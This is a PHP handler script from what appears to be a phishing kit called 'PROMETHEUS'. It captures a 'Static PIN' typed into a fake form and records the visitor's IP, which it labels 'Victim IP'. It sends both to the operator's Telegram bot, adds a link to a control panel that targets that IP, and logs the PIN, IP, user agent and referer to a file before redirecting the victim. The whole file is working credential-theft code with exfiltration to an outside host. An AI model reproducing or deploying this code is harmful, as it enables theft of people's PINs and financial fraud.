<?php
session_start();
include '../config.php';

function getClientIP() {
    $ipKeys = ['HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'REMOTE_ADDR'];
    
    foreach($ipKeys as $key) {
        if (array_key_exists($key, $_SERVER) === true) {
            foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                    return $ip;
                }
            }
        }
    }
    
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    
    if ($ip === '::1') {
        $ip = '127.0.0.1';
    }
    
    return $ip;
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $fn = $_POST['fn'] ?? '';
    
    if (empty($fn)) {
        header("Location: ../loading.php?error=empty_pin");
        exit();
    }
    
    $ip = getClientIP();
    
    $telegramMessage = "STATIC PIN / PROMETHEUS\n\n";
    $telegramMessage .= "Static PIN: " . $fn . "\n";
    $telegramMessage .= "IP Address: " . $ip . "\n\n";
    $telegramMessage .= "Paneeeel: https://" . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['PHP_SELF'])) . "/panelos.php?target_ip=" . $ip;
    $telegramMessage .= "\nVictim IP: " . $ip;

    if (defined('TELEGRAM_BOT_TOKEN') && defined('TELEGRAM_CHAT_ID') && 
        TELEGRAM_BOT_TOKEN !== 'YOUR_TELEGRAM_BOT_TOKEN' && TELEGRAM_CHAT_ID !== 'YOUR_CHAT_ID') {
        $telegramUrl = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";
        
        $telegramPayload = array(
            'chat_id' => TELEGRAM_CHAT_ID,
            'text' => $telegramMessage,
            'parse_mode' => 'HTML'
        );
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $telegramUrl);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($telegramPayload));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'Content-Type: application/x-www-form-urlencoded'
        ));
        
        $telegramResponse = curl_exec($ch);
        curl_close($ch);
    }
    
    $logData = [
        'timestamp' => date('Y-m-d H:i:s'),
        'page' => 'static',
        'fn' => $fn,
        'ip' => $ip,
        'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? '',
        'referer' => $_SERVER['HTTP_REFERER'] ?? ''
    ];
    
    $logFile = fopen('../logs/static_log.txt', 'a');
    if ($logFile) {
        fwrite($logFile, json_encode($logData) . "\n");
        fclose($logFile);
    }
    
    header("Location: ../loading.php");
    exit();
} else {
    header("Location: ../static.php");
    exit();
}
?>